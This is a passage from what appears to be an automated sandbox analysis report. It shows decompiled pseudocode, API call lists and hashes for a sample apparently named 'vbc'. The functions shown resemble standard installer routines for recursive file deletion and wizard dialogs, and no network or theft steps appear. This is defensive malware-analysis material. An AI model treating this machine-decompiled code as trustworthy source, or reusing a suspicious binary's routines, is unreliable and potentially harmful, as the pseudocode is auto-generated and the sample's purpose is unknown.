						lstrcatW(0x7a3f90, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040666E(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D32(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056D0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8b28 =  *0x7a8b28 + 1;
										} else {
											E004056D0(0xfffffff1, _t68);
											E0040642E(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D7A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x7a3f90 - 0x5c;
					if( *0x7a3f90 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004069A4(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F3D(_t68);
							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056D0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056D0(0xfffffff1, _t68);
							return E0040642E(_t67, _t68, 0);
						}
						L30:
						 *0x7a8b28 =  *0x7a8b28 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                        0x00405d84
                                                        0x00405d89
                                                        0x00405d92
                                                        0x00405d95
                                                        0x00405d9d
                                                        0x00405da0
                                                        0x00405da3
                                                        0x00405dab
                                                        0x00405dad
                                                        0x00405dae
                                                        0x00000000
                                                        0x00405dae
                                                        0x00405db9
                                                        0x00405dbc
                                                        0x00405dbc
                                                        0x00405dbc
                                                        0x00405dc0
                                                        0x00405dd3
                                                        0x00405dda
                                                        0x00405ddf
                                                        0x00405de3
                                                        0x00405df3
                                                        0x00405de5
                                                        0x00405deb
                                                        0x00405deb
                                                        0x00405df8
                                                        0x00405dfc
                                                        0x00405e08
                                                        0x00405e0e
                                                        0x00405e13
                                                        0x00405e19
                                                        0x00405e24
                                                        0x00405e2a
                                                        0x00405e2c
                                                        0x00405e2f
                                                        0x00405ed9
                                                        0x00405ed9
                                                        0x00405edd
                                                        0x00405edf
                                                        0x00405edf
                                                        0x00405edf
                                                        0x00405edf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405e35
                                                        0x00405e35
                                                        0x00405e35
                                                        0x00405e3d
                                                        0x00405e5d
                                                        0x00405e65
                                                        0x00405e6a
                                                        0x00405e71
                                                        0x00405e8c
                                                        0x00405e91
                                                        0x00405e93
                                                        0x00405eb7
                                                        0x00405e95
                                                        0x00405e95
                                                        0x00405e98
                                                        0x00405eac
                                                        0x00405e9a
                                                        0x00405e9d
                                                        0x00405ea5
                                                        0x00405ea5
                                                        0x00405e98
                                                        0x00405e73
                                                        0x00405e79
                                                        0x00405e7b
                                                        0x00405e81
                                                        0x00405e81
                                                        0x00405e7b
                                                        0x00000000
                                                        0x00405e71
                                                        0x00405e3f
                                                        0x00405e47
                                                        0x00000000
                                                        0x00000000
                                                        0x00405e49
                                                        0x00405e51
                                                        0x00000000
                                                        0x00000000
                                                        0x00405e53
                                                        0x00405e5b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405ebc
                                                        0x00405ec4
                                                        0x00405eca
                                                        0x00405eca
                                                        0x00405ed3
                                                        0x00000000
                                                        0x00405ed3
                                                        0x00405dfe
                                                        0x00405e06
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405dc2
                                                        0x00405dc2
                                                        0x00405dc4
                                                        0x00405ee4
                                                        0x00405ee6
                                                        0x00405ee9
                                                        0x00405f3a
                                                        0x00405f3a
                                                        0x00405f3a
                                                        0x00405eeb
                                                        0x00405eee
                                                        0x00405ef9
                                                        0x00405efe
                                                        0x00405f00
                                                        0x00000000
                                                        0x00000000
                                                        0x00405f03
                                                        0x00405f0f
                                                        0x00405f14
                                                        0x00405f16
                                                        0x00000000
                                                        0x00405f31
                                                        0x00405f18
                                                        0x00405f1b
                                                        0x00000000
                                                        0x00000000
                                                        0x00405f20
                                                        0x00000000
                                                        0x00405f27
                                                        0x00405ef0
                                                        0x00405ef0
                                                        0x00000000
                                                        0x00405ef0
                                                        0x00405dca
                                                        0x00405dcd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405dcd

                                                        APIs
                                                        • DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405DA3
                                                        • lstrcatW.KERNEL32 ref: 00405DEB
                                                        • lstrcatW.KERNEL32 ref: 00405E0E
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E14
                                                        • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E24
                                                        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
                                                        • FindClose.KERNELBASE(00000000), ref: 00405ED3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: .$.$\*.*
                                                        • API String ID: 2035342205-3749113046
                                                        • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                                                        • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
                                                        • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                                                        • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004069A4 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004069A4(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4fd8;
			}




                                                        0x004069af
                                                        0x004069b8
                                                        0x00000000
                                                        0x004069c5
                                                        0x004069bb
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(7556D4C4,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004069AF
                                                        • FindClose.KERNEL32(00000000), ref: 004069BB
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                                                        • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
                                                        • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                                                        • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004040CB Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 141 4040cb-4040dd 142 4040e3-4040e9 141->142 143 404244-404253 141->143 142->143 146 4040ef-4040f8 142->146 144 4042a2-4042b7 143->144 145 404255-40429d GetDlgItem * 2 call 4045ca SetClassLongW call 40140b 143->145 148 4042f7-4042fc call 404616 144->148 149 4042b9-4042bc 144->149 145->144 150 4040fa-404107 SetWindowPos 146->150 151 40410d-404114 146->151 165 404301-40431c 148->165 155 4042be-4042c9 call 401389 149->155 156 4042ef-4042f1 149->156 150->151 152 404116-404130 ShowWindow 151->152 153 404158-40415e 151->153 158 404231-40423f call 404631 152->158 159 404136-404149 GetWindowLongW 152->159 160 404160-404172 DestroyWindow 153->160 161 404177-40417a 153->161 155->156 181 4042cb-4042ea SendMessageW 155->181 156->148 164 404597 156->164 171 404599-4045a0 158->171 159->158 168 40414f-404152 ShowWindow 159->168 169 404574-40457a 160->169 172 40417c-404188 SetWindowLongW 161->172 173 40418d-404193 161->173 164->171 166 404325-40432b 165->166 167 40431e-404320 call 40140b 165->167 178 404331-40433c 166->178 179 404555-40456e DestroyWindow EndDialog 166->179 167->166 168->153 169->164 177 40457c-404582 169->177 172->171 173->158 180 404199-4041a8 GetDlgItem 173->180 177->164 183 404584-40458d ShowWindow 177->183 178->179 184 404342-40438f call 4066ab call 4045ca * 3 GetDlgItem 178->184 179->169 185 4041c7-4041ca 180->185 186 4041aa-4041c1 SendMessageW IsWindowEnabled 180->186 181->171 183->164 213 404391-404396 184->213 214 404399-4043d5 ShowWindow EnableWindow call 4045ec EnableWindow 184->214 188 4041cc-4041cd 185->188 189 4041cf-4041d2 185->189 186->164 186->185 191 4041fd-404202 call 4045a3 188->191 192 4041e0-4041e5 189->192 193 4041d4-4041da 189->193 191->158 194 4041e7-4041ed 192->194 195 40421b-40422b SendMessageW 192->195 193->195 198 4041dc-4041de 193->198 199 404204-40420d call 40140b 194->199 200 4041ef-4041f5 call 40140b 194->200 195->158 198->191 199->158 210 40420f-404219 199->210 209 4041fb 200->209 209->191 210->209 213->214 217 4043d7-4043d8 214->217 218 4043da 214->218 219 4043dc-40440a GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 40440c-40441d SendMessageW 219->220 221 40441f 219->221 222 404425-404464 call 4045ff call 4040ac call 40666e lstrlenW call 4066ab SetWindowTextW call 401389 220->222 221->222 222->165 233 40446a-40446c 222->233 233->165 234 404472-404476 233->234 235 404495-4044a9 DestroyWindow 234->235 236 404478-40447e 234->236 235->169 238 4044af-4044dc CreateDialogParamW 235->238 236->164 237 404484-40448a 236->237 237->165 239 404490 237->239 238->169 240 4044e2-404539 call 4045ca GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->164 240->164 245 40453b-404553 ShowWindow call 404616 240->245 245->169
                                                        C-Code - Quality: 84%
                                                        			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f70 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8aa8 = _t127;
						 *0x7a1f84 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff50 = _t91;
						E004045CA(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88);
						 *0x7a7a6c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f70 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8ac0;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404616(0x40b);
						while(1) {
							_t36 =  *0x7a1f70;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x7a8ac4;
							if(_t38 ==  *0x7a8ac4) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a6c - _t136;
							if( *0x7a7a6c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045CA(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8b2c - _t136;
							_v28 = _t48;
							if( *0x7a8b2c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045EC(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff50, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8b2c - _t136;
							if( *0x7a8b2c == _t136) {
								_push( *0x7a1f84);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff50);
							}
							E004045FF();
							E0040666E(0x7a1f88, E004040AC());
							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f88);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a78);
									 *0x7a0f60 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x7a7a78 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045CA(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x7a7a6c - _t136;
									if( *0x7a7a6c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a78, 8);
									E00404616(0x405);
									goto L60;
								}
								__eflags =  *0x7a8b2c - _t136;
								if( *0x7a8b2c != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8b20 - _t136;
								if( *0x7a8b20 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a78); // executed
						 *0x7a8aa8 = _t136;
						EndDialog(_t127,  *0x7a0758); // executed
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
						__eflags =  *0x7a7a6c;
						return 0 |  *0x7a7a6c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8b2c - _t136;
											if( *0x7a8b2c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0758 = 1;
												L23:
												_push(0x78);
												L24:
												E004045A3();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0758 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a78);
						 *0x7a7a78 = _t122;
						L60:
						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x7a3f88 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404631(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                        0x004040d6
                                                        0x004040dd
                                                        0x00404244
                                                        0x00404248
                                                        0x0040424c
                                                        0x0040424e
                                                        0x00404253
                                                        0x0040425e
                                                        0x00404269
                                                        0x0040426e
                                                        0x00404270
                                                        0x00404272
                                                        0x00404275
                                                        0x0040427a
                                                        0x00404288
                                                        0x00404295
                                                        0x0040429c
                                                        0x0040429c
                                                        0x0040429d
                                                        0x0040429d
                                                        0x004042a2
                                                        0x004042a8
                                                        0x004042af
                                                        0x004042b5
                                                        0x004042b7
                                                        0x004042f7
                                                        0x004042fc
                                                        0x00404301
                                                        0x00404301
                                                        0x00404306
                                                        0x0040430f
                                                        0x00404311
                                                        0x00404316
                                                        0x0040431c
                                                        0x00404320
                                                        0x00404320
                                                        0x00404325
                                                        0x0040432b
                                                        0x00000000
                                                        0x00000000
                                                        0x00404336
                                                        0x0040433c
                                                        0x00000000
                                                        0x00000000
                                                        0x00404345
                                                        0x0040434d
                                                        0x00404352
                                                        0x00404355
                                                        0x0040435b
                                                        0x00404360
                                                        0x00404363
                                                        0x00404369
                                                        0x0040436e
                                                        0x00404371
                                                        0x00404377
                                                        0x0040437f
                                                        0x00404385
                                                        0x0040438b
                                                        0x0040438f
                                                        0x00404396
                                                        0x00404396
                                                        0x00404396
                                                        0x004043a0
                                                        0x004043b2
                                                        0x004043be
                                                        0x004043c3
                                                        0x004043cd
                                                        0x004043d3
                                                        0x004043d5
                                                        0x004043da
                                                        0x004043d7
                                                        0x004043d7
                                                        0x004043d7
                                                        0x004043ea
                                                        0x00404402
                                                        0x00404404
                                                        0x0040440a
                                                        0x0040441f
                                                        0x0040440c
                                                        0x00404415
                                                        0x00404417
                                                        0x00404417
                                                        0x00404425
                                                        0x00404436
                                                        0x0040444c
                                                        0x00404453
                                                        0x00404459
                                                        0x0040445d
                                                        0x00404462
                                                        0x00404464
                                                        0x00000000
                                                        0x0040446a
                                                        0x0040446a
                                                        0x0040446c
                                                        0x00000000
                                                        0x00000000
                                                        0x00404472
                                                        0x00404476
                                                        0x0040449b
                                                        0x004044a1
                                                        0x004044a7
                                                        0x004044a9
                                                        0x00000000
                                                        0x00000000
                                                        0x004044cf
                                                        0x004044d5
                                                        0x004044d7
                                                        0x004044dc
                                                        0x00000000
                                                        0x00000000
                                                        0x004044e2
                                                        0x004044e5
                                                        0x004044e8
                                                        0x004044ff
                                                        0x0040450b
                                                        0x00404524
                                                        0x0040452a
                                                        0x0040452e
                                                        0x00404533
                                                        0x00404539
                                                        0x00000000
                                                        0x00000000
                                                        0x00404543
                                                        0x0040454e
                                                        0x00000000
                                                        0x0040454e
                                                        0x00404478
                                                        0x0040447e
                                                        0x00000000
                                                        0x00000000
                                                        0x00404484
                                                        0x0040448a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404490
                                                        0x00404464
                                                        0x0040455b
                                                        0x00404567
                                                        0x0040456e
                                                        0x00000000
                                                        0x004042b9
                                                        0x004042b9
                                                        0x004042bc
                                                        0x004042ef
                                                        0x004042ef
                                                        0x004042f1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004042f1
                                                        0x004042be
                                                        0x004042c2
                                                        0x004042c7
                                                        0x004042c9
                                                        0x00000000
                                                        0x00000000
                                                        0x004042d9
                                                        0x004042e1
                                                        0x00000000
                                                        0x004042e7
                                                        0x004040ef
                                                        0x004040ef
                                                        0x004040f3
                                                        0x004040f8
                                                        0x00404107
                                                        0x00404107
                                                        0x0040410d
                                                        0x00404114
                                                        0x00404158
                                                        0x0040415e
                                                        0x00404177
                                                        0x0040417a
                                                        0x0040418d
                                                        0x00404193
                                                        0x00000000
                                                        0x00000000
                                                        0x00404199
                                                        0x004041a4
                                                        0x004041a6
                                                        0x004041a8
                                                        0x004041c7
                                                        0x004041c7
                                                        0x004041ca
                                                        0x004041cf
                                                        0x004041d2
                                                        0x004041e2
                                                        0x004041e3
                                                        0x004041e5
                                                        0x0040421b
                                                        0x0040422b
                                                        0x00000000
                                                        0x0040422b
                                                        0x004041e7
                                                        0x004041ed
                                                        0x00404206
                                                        0x0040420b
                                                        0x0040420d
                                                        0x00000000
                                                        0x00000000
                                                        0x0040420f
                                                        0x004041fb
                                                        0x004041fb
                                                        0x004041fd
                                                        0x004041fd
                                                        0x00000000
                                                        0x004041fd
                                                        0x004041f0
                                                        0x004041f5
                                                        0x00000000
                                                        0x004041f5
                                                        0x004041d4
                                                        0x004041da
                                                        0x00000000
                                                        0x00000000
                                                        0x004041dc
                                                        0x00000000
                                                        0x004041dc
                                                        0x004041cc
                                                        0x00000000
                                                        0x004041cc
                                                        0x004041b2
                                                        0x004041b9
                                                        0x004041bf
                                                        0x004041c1
                                                        0x00404597
                                                        0x00000000
                                                        0x00404597
                                                        0x00000000
                                                        0x004041c1
                                                        0x0040417f
                                                        0x00000000
                                                        0x00404187
                                                        0x00404166
                                                        0x0040416c
                                                        0x00404574
                                                        0x0040457a
                                                        0x00404587
                                                        0x0040458d
                                                        0x0040458d
                                                        0x00000000
                                                        0x00404116
                                                        0x0040411b
                                                        0x00404127
                                                        0x00404130
                                                        0x00404231
                                                        0x00000000
                                                        0x0040414f
                                                        0x00404152
                                                        0x00000000
                                                        0x00404152
                                                        0x00404130
                                                        0x00404114

                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
                                                        • ShowWindow.USER32(?), ref: 00404127
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404139
                                                        • ShowWindow.USER32(?,00000004), ref: 00404152
                                                        • DestroyWindow.USER32 ref: 00404166
                                                        • SetWindowLongW.USER32 ref: 0040417F
                                                        • GetDlgItem.USER32(?,?), ref: 0040419E
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
                                                        • IsWindowEnabled.USER32(00000000), ref: 004041B9
                                                        • GetDlgItem.USER32(?,00000001), ref: 00404264
                                                        • GetDlgItem.USER32(?,00000002), ref: 0040426E
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404288
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
                                                        • GetDlgItem.USER32(?,00000003), ref: 0040437F
                                                        • ShowWindow.USER32(00000000,?), ref: 004043A0
                                                        • EnableWindow.USER32(?,?), ref: 004043B2
                                                        • EnableWindow.USER32(?,?), ref: 004043CD
                                                        • GetSystemMenu.USER32 ref: 004043E3
                                                        • EnableMenuItem.USER32 ref: 004043EA
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
                                                        • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
                                                        • SetWindowTextW.USER32 ref: 00404453
                                                        • ShowWindow.USER32(?,0000000A), ref: 00404587
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
